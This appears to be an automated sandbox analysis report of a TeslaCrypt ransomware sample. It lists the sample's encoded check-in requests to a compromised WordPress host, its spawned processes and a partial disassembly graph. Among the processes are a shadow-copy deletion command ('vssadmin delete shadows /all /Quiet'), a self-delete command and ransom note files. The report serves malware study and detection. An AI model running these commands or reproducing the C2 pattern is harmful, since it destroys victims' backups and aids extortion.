                                                                                                                          Jan 8, 2025 21:10:06.091309071 CET328INData Raw: 3d 22 2f 76 69 64 65 6f 73 2f 35 36 30 30 37 38 37 22 20 63 6c 61 73 73 3d 22 74 68 75 6d 62 22 3e 3c 70 69 63 74 75 72 65 3e 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 3a 2f 2f 69 6d 61 67 65 73 2e 63 64 6e 76 2e 70 72 6f 6e 74
                                                                                                                          Data Ascii: ="/videos/5600787" class="thumb"><picture><source srcset="http://images.cdnv.prontoservers.net/sc/5/5588/5588111/promo/crop/302x201/promo_13.webp?validfrom=1736284800&validto=1736371200&hash=V8%2FMlB4N1ZdxFBfscdKHlTkHv%2BU%3D" type="image/webp
                                                                                                                          Jan 8, 2025 21:10:06.095966101 CET1236INData Raw: 30 32 78 32 30 31 2f 70 72 6f 6d 6f 5f 31 33 2e 6a 70 67 3f 76 61 6c 69 64 66 72 6f 6d 3d 31 37 33 36 32 38 34 38 30 30 26 76 61 6c 69 64 74 6f 3d 31 37 33 36 33 37 31 32 30 30 26 68 61 73 68 3d 6e 77 5a 68 39 31 4b 6b 31 75 42 76 48 79 65 25 32
                                                                                                                          Data Ascii: 02x201/promo_13.jpg?validfrom=1736284800&validto=1736371200&hash=nwZh91Kk1uBvHye%2FXYlLXXOoUxI%3D" type="image/jpeg"><img src="http://images.cdnv.prontoservers.net/sc/5/5588/5588111/promo/crop/302x201/promo_13.jpg?validfrom=1736284800&validto=


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.2249166185.230.63.1714433504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-08 20:10:03 UTC661OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Host: serenitynowbooksandgifts.com
                                                                                                                          2025-01-08 20:10:03 UTC878INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:03 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          location: https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975=
                                                                                                                          x-wix-cache-control: public, max-age=86400
                                                                                                                          strict-transport-security: max-age=86400
                                                                                                                          x-wix-request-id: 1736367003.224975705740410926
                                                                                                                          Age: 0
                                                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1
                                                                                                                          2025-01-08 20:10:03 UTC487INData Raw: 58 2d 53 65 65 6e 2d 42 79 3a 20 41 48 63 33 54 58 4c 63 58 4f 75 6c 2b 74 39 4c 49 62 47 67 39 63 69 48 45 34 64 62 77 2b 77 65 77 6f 4a 35 6e 76 4b 6f 79 6a 45 3d 2c 6d 30 6a 32 45 45 6b 6e 47 49 56 55 57 2f 6c 69 59 38 42 4c 4c 75 39 63 4d 45 74 4a 70 57 58 4f 39 46 34 72 62 50 43 5a 54 34 34 6d 2b 2b 43 32 58 6b 75 54 76 6e 6c 52 46 67 32 58 69 53 44 4c 2c 32 64 35 38 69 66 65 62 47 62 6f 73 79 35 78 63 2b 46 52 61 6c 74 32 36 4e 73 70 52 56 74 54 38 62 30 31 56 4c 47 59 37 42 66 4f 63 50 78 46 55 39 58 47 6f 62 71 4e 34 6d 68 30 2f 4e 62 76 49 5a 37 66 48 53 41 4f 42 66 47 42 4b 35 30 58 6e 52 5a 45 79 49 51 3d 3d 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 50 47 6e 77 45 61 34 61 68 44 47 55 63 5a 6f 4d 4c 2b 34 68 39 42 6a 50
                                                                                                                          Data Ascii: X-Seen-By: AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLu9cMEtJpWXO9F4rbPCZT44m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalt26NspRVtT8b01VLGY7BfOcPxFU9XGobqN4mh0/NbvIZ7fHSAOBfGBK50XnRZEyIQ==,2UNV7KOq4oGjA5+PKsX47PGnwEa4ahDGUcZoML+4h9BjP


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.224916734.149.87.454433504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-08 20:10:03 UTC666OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975= HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Host: www.serenitynowbooksandgifts.com
                                                                                                                          2025-01-08 20:10:04 UTC1016INHTTP/1.1 404 Not Found
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Language: en
                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                          X-Wix-Request-Id: 1736367004.62597576918143767537
                                                                                                                          Cache-Control: public,max-age=0,must-revalidate
                                                                                                                          Server: Pepyaka
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 0
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:04 GMT
                                                                                                                          X-Served-By: cache-iad-kcgs7200141-IAD
                                                                                                                          X-Cache: MISS
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_uw2-pub-1_g
                                                                                                                          X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,2d58ifebGbosy5xc+FRals42LSZ5E8bBqQxaDpUjQFJ2PYQ+5XrUIsPbv0s/gX53wvb3kWKRIgMIyffV4MmqLA==,2UNV7KOq4oGjA5+PKsX47PGnwEa4ahDGUcZoML+4h9BjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+JDBpdtDb0a8zNGo3JIhIcQ=,EJEd9b7dmFptmyI1HOovvzWqeDfbs7uk1J4m171zrEASO5XmrrCSQNDehIjmfew3RuKHdiN8uGiJxsD4qbIdaw==
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Via: 1.1 google
                                                                                                                          glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2025-01-08 20:10:04 UTC374INData Raw: 62 39 31 0d 0a 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20
                                                                                                                          Data Ascii: b91 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible"
                                                                                                                          2025-01-08 20:10:04 UTC1390INData Raw: 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20
                                                                                                                          Data Ascii: name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link
                                                                                                                          2025-01-08 20:10:04 UTC1209INData Raw: 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70
                                                                                                                          Data Ascii: parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesAp


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:15:09:30
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\0t8amSU3vd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\0t8amSU3vd.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:15:09:31
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 91%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:15:09:31
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
                                                                                                                          Imagebase:0x4a970000
                                                                                                                          File size:302'592 bytes
                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:15:09:33
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                                                                                          Imagebase:0xff880000
                                                                                                                          File size:167'424 bytes
                                                                                                                          MD5 hash:E23DD973E1444684EB36365DEFF1FC74
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:15:09:42
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:15:09:51
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:15:09:59
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:15:10:59
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
                                                                                                                          Imagebase:0x13fe30000
                                                                                                                          File size:3'151'128 bytes
                                                                                                                          MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:15:11:01
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x13fe30000
                                                                                                                          File size:3'151'128 bytes
                                                                                                                          MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:15:11:07
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
                                                                                                                          Imagebase:0xff580000
                                                                                                                          File size:193'536 bytes
                                                                                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:98.1%
                                                                                                                            Signature Coverage:19.4%
                                                                                                                            Total number of Nodes:516
                                                                                                                            Total number of Limit Nodes:14
                                                                                                                            execution_graph 21776 3b1e3a 21777 3b1e3c VirtualAlloc 21776->21777 21778 3b1e48 21777->21778 21794 3b1ebb 21778->21794 21780 3b1eb4 21782 3b1f4f 21820 3b1f6a 10 API calls 21782->21820 21784 3b1f5e 21785 3b1fe3 21784->21785 21808 3b20b8 21785->21808 21787 3b2124 CreateThread 21789 3b2130 21787->21789 21829 4254e1 5 API calls ___security_init_cookie 21787->21829 21788 3b20ab 21788->21787 21816 3b216c 21789->21816 21791 3b215a 21792 3b21d8 RtlExitUserThread 21791->21792 21793 3b21e4 21792->21793 21795 3b1ed8 21794->21795 21796 3b1f4f 21795->21796 21799 3b1fe3 21795->21799 21821 3b1f6a 10 API calls 21796->21821 21798 3b1f5e 21798->21799 21800 3b20b8 8 API calls 21799->21800 21802 3b20ab 21800->21802 21801 3b2124 CreateThread 21803 3b2130 21801->21803 21826 4254e1 5 API calls ___security_init_cookie 21801->21826 21802->21801 21804 3b216c RtlExitUserThread 21803->21804 21805 3b215a 21804->21805 21806 3b21d8 RtlExitUserThread 21805->21806 21807 3b1ea7 21806->21807 21807->21780 21807->21782 21807->21785 21809 3b20d5 21808->21809 21810 3b2124 CreateThread 21809->21810 21811 3b2130 21810->21811 21827 4254e1 5 API calls ___security_init_cookie 21810->21827 21812 3b216c RtlExitUserThread 21811->21812 21813 3b215a 21812->21813 21814 3b21d8 RtlExitUserThread 21813->21814 21815 3b21e4 21814->21815 21815->21788 21817 3b2189 21816->21817 21818 3b21d8 RtlExitUserThread 21817->21818 21819 3b21e4 21818->21819 21819->21791 21820->21784 21828 4254e1 5 API calls ___security_init_cookie 21820->21828 21821->21798 21822 4254e1 21821->21822 21825 42ae84 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21822->21825 21824 4254e6 21824->21824 21825->21824 22386 41ea40 EndDialog 21831 3b1639 21832 3b1654 21831->21832 21833 3b1666 VirtualProtect 21832->21833 21834 3b1672 21833->21834 21835 3b1797 VirtualProtect 21834->21835 21836 3b17d6 21834->21836 21835->21834 21838 3b0938 21839 3b093a EnumWindows 21838->21839 21840 3b0946 21839->21840 21841 3b203d 21842 3b203e 21841->21842 21843 3b20b8 8 API calls 21842->21843 21845 3b20ab 21843->21845 21844 3b2124 CreateThread 21846 3b2130 21844->21846 21851 4254e1 5 API calls ___security_init_cookie 21844->21851 21845->21844 21847 3b216c RtlExitUserThread 21846->21847 21848 3b215a 21847->21848 21849 3b21d8 RtlExitUserThread 21848->21849 21850 3b21e4 21849->21850 22387 42ec4c CloseHandle 21859 3b1b34 21860 3b1b4f 21859->21860 21861 3b1b61 VirtualProtect 21860->21861 21862 3b1b6d 21861->21862 21863 3b1c8c 21862->21863 21866 3b1c6c 21862->21866 21864 3b216c RtlExitUserThread 21863->21864 21865 3b215a 21864->21865 21869 3b21d8 RtlExitUserThread 21865->21869 21871 3b1dd0 15 API calls 21866->21871 21868 3b1dc3 21868->21863 21870 3b21e4 21869->21870 21871->21868 21872 4254e1 5 API calls ___security_init_cookie 21871->21872 22389 410e50 6 API calls CatchGuardHandler 22393 3b1013 LoadLibraryA 22396 427070 94 API calls __setmbcp 22397 3b1e0f 15 API calls 22398 4254e1 5 API calls ___security_init_cookie 22397->22398 22466 402b74 RaiseException ctype __CxxThrowException@8 21877 3b090d EnumWindows 21879 425374 21917 4299a0 21879->21917 21881 425380 GetStartupInfoW 21882 425394 HeapSetInformation 21881->21882 21884 42539f 21881->21884 21882->21884 21918 425756 HeapCreate 21884->21918 21885 4253ed 21886 4253f8 21885->21886 22082 42534b 66 API calls 3 library calls 21885->22082 21919 4276bf GetModuleHandleW 21886->21919 21889 4253fe 21890 425409 __RTC_Initialize 21889->21890 22083 42534b 66 API calls 3 library calls 21889->22083 21944 429db2 GetStartupInfoW 21890->21944 21894 425423 GetCommandLineW 21957 42ae2c GetEnvironmentStringsW 21894->21957 21898 425433 21964 42ad7e GetModuleFileNameW 21898->21964 21901 425448 21970 42ab4c 21901->21970 21904 42544e 21905 425459 21904->21905 22086 42524d 66 API calls 3 library calls 21904->22086 21984 42502c 21905->21984 21908 425461 21910 42546c __wwincmdln 21908->21910 22087 42524d 66 API calls 3 library calls 21908->22087 21990 41d4d0 21910->21990 21913 42549c 22088 42522f 66 API calls _doexit 21913->22088 21916 4254a1 ___BuildCatchObjectHelper 21917->21881 21918->21885 21920 4276d3 21919->21920 21921 4276dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21919->21921 22089 42740c 70 API calls _free 21920->22089 21923 427726 TlsAlloc 21921->21923 21926 427774 TlsSetValue 21923->21926 21927 427835 21923->21927 21925 4276d8 21925->21889 21926->21927 21928 427785 21926->21928 21927->21889 22090 424fd5 RtlEncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 21928->22090 21930 42778a EncodePointer EncodePointer EncodePointer EncodePointer 22091 42a341 InitializeCriticalSectionAndSpinCount 21930->22091 21932 4277c9 21933 427830 21932->21933 21934 4277cd DecodePointer 21932->21934 22099 42740c 70 API calls _free 21933->22099 21936 4277e2 21934->21936 21936->21933 22092 42bb56 21936->22092 21939 427800 DecodePointer 21940 427811 21939->21940 21940->21933 21941 427815 21940->21941 22098 427449 66 API calls 4 library calls 21941->22098 21943 42781d GetCurrentThreadId 21943->21927 21945 42bb56 __calloc_crt 66 API calls 21944->21945 21951 429dd0 21945->21951 21946 425417 21946->21894 22084 42524d 66 API calls 3 library calls 21946->22084 21947 429f45 21948 429f7b GetStdHandle 21947->21948 21950 429fdf SetHandleCount 21947->21950 21952 429f8d GetFileType 21947->21952 21955 429fb3 InitializeCriticalSectionAndSpinCount 21947->21955 21948->21947 21949 42bb56 __calloc_crt 66 API calls 21949->21951 21950->21946 21951->21946 21951->21947 21951->21949 21956 429ec5 21951->21956 21952->21947 21953 429ef1 GetFileType 21954 429efc InitializeCriticalSectionAndSpinCount 21953->21954 21953->21956 21954->21946 21954->21956 21955->21946 21955->21947 21956->21947 21956->21953 21956->21954 21958 42ae41 21957->21958 21959 42ae3d 21957->21959 22111 42bb11 66 API calls _malloc 21958->22111 21959->21898 21962 42ae6a FreeEnvironmentStringsW 21962->21898 21963 42ae63 _memmove 21963->21962 21965 42adb3 _wparse_cmdline 21964->21965 21966 42543d 21965->21966 21967 42adf0 21965->21967 21966->21901 22085 42524d 66 API calls 3 library calls 21966->22085 22112 42bb11 66 API calls _malloc 21967->22112 21969 42adf6 _wparse_cmdline 21969->21966 21971 42ab64 _wcslen 21970->21971 21974 42ab5c 21970->21974 21972 42bb56 __calloc_crt 66 API calls 21971->21972 21973 42ab88 _wcslen 21972->21973 21973->21974 21975 42abde 21973->21975 21977 42bb56 __calloc_crt 66 API calls 21973->21977 21978 42ac04 21973->21978 21981 42ac1b 21973->21981 22113 424895 21973->22113 21974->21904 22122 424005 66 API calls 2 library calls 21975->22122 21977->21973 22123 424005 66 API calls 2 library calls 21978->22123 22124 425a10 10 API calls __call_reportfault 21981->22124 21983 42ac27 21983->21904 21985 42503a __IsNonwritableInCurrentImage 21984->21985 22128 42a7f2 21985->22128 21987 425058 __initterm_e 21989 425079 __IsNonwritableInCurrentImage 21987->21989 22131 42695b 76 API calls __cinit 21987->22131 21989->21908 22132 42c690 21990->22132 21994 41d52e CoInitializeEx AllocateAndInitializeSid 21995 41d57a CheckTokenMembership 21994->21995 21996 41d5ac SHGetFolderPathW 21994->21996 21997 41d593 21995->21997 21998 41d599 FreeSid 21995->21998 22135 421aa0 21996->22135 21997->21998 21998->21996 22000 41d5e6 CoCreateInstance CoCreateInstance 22001 41d65b 22000->22001 22002 41d68c ExitProcess 22001->22002 22003 41d694 _memset 22001->22003 22004 425203 66 API calls 22003->22004 22007 41d706 22003->22007 22004->22007 22005 41dc33 22202 423ebb 